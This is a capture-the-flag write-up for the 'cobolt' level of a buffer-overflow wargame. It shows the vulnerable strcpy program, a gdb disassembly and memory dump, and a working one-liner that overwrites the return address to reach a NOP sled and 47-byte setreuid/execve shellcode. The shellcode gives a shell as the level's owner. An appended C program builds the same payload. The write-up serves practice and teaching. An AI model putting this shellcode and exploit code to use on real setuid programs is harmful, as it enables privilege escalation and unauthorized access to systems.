Intro
The second monster: gremlin!!
...or so I said, but the solution is exactly the same as gate's. I think the author's intent was "the buffer array got smaller, so solve it without storing the shellcode in buffer!!", but... I'll just ride the NOP sled, heh.
Write UP
Since the approach is exactly the same as gate's, straight to the code. The only thing that changes is the size: the frame is `sub %esp,16` plus the saved ebp, so the return address sits at offset 20 of argv[1], and the shellcode obviously no longer fits in the 16-byte buffer, so it goes after the return address, behind a NOP sled.
[gremlin@localhost gremlin]$ ll
total 16
-rwsr-sr-x 1 cobolt cobolt 11970 Feb 26 2010 cobolt
-rw-r--r-- 1 gremlin gremlin 291 Mar 29 2010 cobolt.c
[gremlin@localhost gremlin]$ cat cobolt.c
/*
The Lord of the BOF : The Fellowship of the BOF
- cobolt
- small buffer
*/
int main(int argc, char *argv[])
{
char buffer[16];
if(argc < 2){
printf("argv error\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
[gremlin@localhost gremlin]$ gdb -q /tmp/cobolt
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048430 : push %ebp
0x8048431 <main+1>: mov %ebp,%esp
0x8048433 <main+3>: sub %esp,16
0x8048436 <main+6>: cmp DWORD PTR [%ebp+8],1
0x804843a <main+10>: jg 0x8048453 <main+35>
0x804843c <main+12>: push 0x80484d0
0x8048441 <main+17>: call 0x8048350
0x8048446 <main+22>: add %esp,4
0x8048449 <main+25>: push 0
0x804844b <main+27>: call 0x8048360
0x8048450 <main+32>: add %esp,4
0x8048453 <main+35>: mov %eax,DWORD PTR [%ebp+12]
0x8048456 <main+38>: add %eax,4
0x8048459 <main+41>: mov %edx,DWORD PTR [%eax]
0x804845b <main+43>: push %edx
0x804845c <main+44>: lea %eax,[%ebp-16]
0x804845f <main+47>: push %eax
0x8048460 <main+48>: call 0x8048370
0x8048465 <main+53>: add %esp,8
0x8048468 <main+56>: lea %eax,[%ebp-16]
0x804846b <main+59>: push %eax
0x804846c <main+60>: push 0x80484dc
0x8048471 <main+65>: call 0x8048350
0x8048476 <main+70>: add %esp,8
0x8048479 <main+73>: leave
0x804847a <main+74>: ret
0x804847b <main+75>: nop
0x804847c <main+76>: nop
0x804847d <main+77>: nop
0x804847e <main+78>: nop
0x804847f <main+79>: nop
End of assembler dump.
(gdb) b *main+53
Breakpoint 1 at 0x8048465
(gdb) r `python -c 'print "A" * 20 + "BBBB" + "\x90" * 100 + "CCCC"'`
Starting program: /tmp/cobolt `python -c 'print "A" * 20 + "BBBB" + "\x90" * 100 + "CCCC"'`
Breakpoint 1, 0x8048465 in main ()
(gdb) x/100wx $ebp-16
0xbffffaa8: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffab8: 0x41414141 0x42424242 0x90909090 0x90909090
0xbffffac8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffad8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffae8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffaf8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb08: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb18: 0x90909090 0x90909090 0x90909090 0x43434343
0xbffffb28: 0xbffffe00 0xbffffee3 0xbffffef8 0xbfffff17
0xbffffb38: 0xbfffff22 0xbfffff32 0xbfffff3a 0xbfffff4b
0xbffffb48: 0xbfffff55 0xbfffff63 0xbfffff74 0xbfffff82
0xbffffb58: 0xbfffff8d 0xbfffffa0 0x00000000 0x00000003
0xbffffb68: 0x08048034 0x00000004 0x00000020 0x00000005
0xbffffb78: 0x00000006 0x00000006 0x00001000 0x00000007
0xbffffb88: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffffb98: 0x08048380 0x0000000b 0x000001f5 0x0000000c
0xbffffba8: 0x000001f5 0x0000000d 0x000001f5 0x0000000e
0xbffffbb8: 0x000001f5 0x00000010 0x0f8bfbff 0x0000000f
0xbffffbc8: 0xbffffbf2 0x00000000 0x00000000 0x00000000
0xbffffbd8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbe8: 0x00000000 0x00000000 0x36690000 0x2f003638
0xbffffbf8: 0x2f706d74 0x6f626f63 0x4100746c 0x41414141
0xbffffc08: 0x41414141 0x41414141 0x41414141 0x42414141
0xbffffc18: 0x90424242 0x90909090 0x90909090 0x90909090
0xbffffc28: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb) q
The program is running. Exit anyway? (y or n) y
[gremlin@localhost gremlin]$ ./cobolt `python -c 'print "A" * 20 + "\xd8\xfa\xff\xbf" + "\x90" * 100 + "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAA▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒1̀▒É▒1▒F̀1▒Ph//shh/bin▒▒PS▒▒°
̀1▒̀
bash$ whoami
cobolt
bash$ /bin/my-paps
sh: /bin/my-paps: No such file or directory
bash$ /bin/my-pass
euid = 502
hacking exposed
Exploit!
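The same argv[1] payload, rebuilt as an added C example (this is not code from the write-up). It lays out the four fields explicitly, packs the return address little-endian, refuses any payload containing a NUL byte (strcpy would stop copying there and the saved eip would never be overwritten), and checks that the chosen return address falls inside the NOP sled at the addresses gdb showed (buffer at $ebp-16 = 0xbffffaa8). The shellcode bytes and the 0xbffffad8 return address are the ones used above; the function names and the `mkpayload` binary name are my own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example for this write-up, not the author's code. Rebuilds the
 * argv[1] payload used above: [20 x 'A'][ret][100 x NOP][shellcode].
 * main() has a 16-byte buffer and one saved ebp below the return address,
 * so the saved eip sits at offset 16 + 4 = 20 of the copied string. */
#define BUF_SIZE   16
#define RET_OFFSET (BUF_SIZE + 4)
#define NOP_COUNT  100

/* The 47-byte shellcode from the write-up:
 * setreuid(geteuid(), geteuid()); execve("/bin//sh", ...); exit(). */
static const unsigned char shellcode[] =
    "\x31\xc0\xb0\x31\xcd\x80"                 /* geteuid()              */
    "\x89\xc3\x89\xc1"                         /* ebx = ecx = euid       */
    "\x31\xc0\xb0\x46\xcd\x80"                 /* setreuid(euid, euid)   */
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68"         /* push 0, push "//sh"    */
    "\x68\x2f\x62\x69\x6e\x89\xe3"             /* push "/bin"; ebx = esp */
    "\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" /* execve(ebx, ecx, edx)  */
    "\x31\xc0\xb0\x01\xcd\x80";                /* exit()                 */
#define SHELLCODE_LEN (sizeof(shellcode) - 1)  /* drop the literal's NUL */

/* Pack a 32-bit address little-endian (0xbffffad8 -> d8 fa ff bf). */
static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v);
    p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16);
    p[3] = (unsigned char)(v >> 24);
}

/* Build the payload into out. Returns its length, or 0 if it does not fit
 * or contains a NUL byte (strcpy would truncate the copy at that byte). */
size_t build_payload(unsigned char *out, size_t cap, uint32_t ret_addr)
{
    size_t len = RET_OFFSET + 4 + NOP_COUNT + SHELLCODE_LEN;
    size_t i;
    if (cap < len)
        return 0;
    memset(out, 'A', RET_OFFSET);                    /* buffer + saved ebp */
    put_le32(out + RET_OFFSET, ret_addr);            /* saved eip          */
    memset(out + RET_OFFSET + 4, 0x90, NOP_COUNT);   /* NOP sled           */
    memcpy(out + RET_OFFSET + 4 + NOP_COUNT, shellcode, SHELLCODE_LEN);
    for (i = 0; i < len; i++)
        if (out[i] == 0)
            return 0;
    return len;
}

/* Does ret_addr point into the NOP sled, given where gdb showed the buffer
 * ($ebp-16)? The sled starts right after the overwritten return address. */
int ret_hits_sled(uint32_t buffer_addr, uint32_t ret_addr)
{
    uint32_t sled_start = buffer_addr + RET_OFFSET + 4;
    uint32_t sled_end = sled_start + NOP_COUNT;      /* exclusive */
    return ret_addr >= sled_start && ret_addr < sled_end;
}

int main(void)
{
    unsigned char payload[512];
    const uint32_t buffer_addr = 0xbffffaa8u;  /* $ebp-16 in the gdb dump   */
    const uint32_t ret_addr = 0xbffffad8u;     /* address used in the exploit */
    size_t n = build_payload(payload, sizeof payload, ret_addr);

    if (n == 0 || !ret_hits_sled(buffer_addr, ret_addr)) {
        fprintf(stderr, "bad payload or return address\n");
        return 1;
    }
    /* Raw bytes to stdout, so ./cobolt "$(./mkpayload)" replaces the python one-liner. */
    fwrite(payload, 1, n, stdout);
    return 0;
}
```

Caveat: `ret_hits_sled` only checks against the gdb snapshot. The bare `./cobolt` run has a different argv[0] and environment than `gdb /tmp/cobolt`, so the buffer moves a little between the two; that shift is exactly what the 100-byte sled is there to absorb, which is why 0xbffffad8 (24 bytes into the sled as gdb saw it) still works in the real run.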
Wrap-up
Huh.. I thought there would be something hidden, but it was the same as gate lol. For the detailed explanation, see gate!! I'm off to the next level!!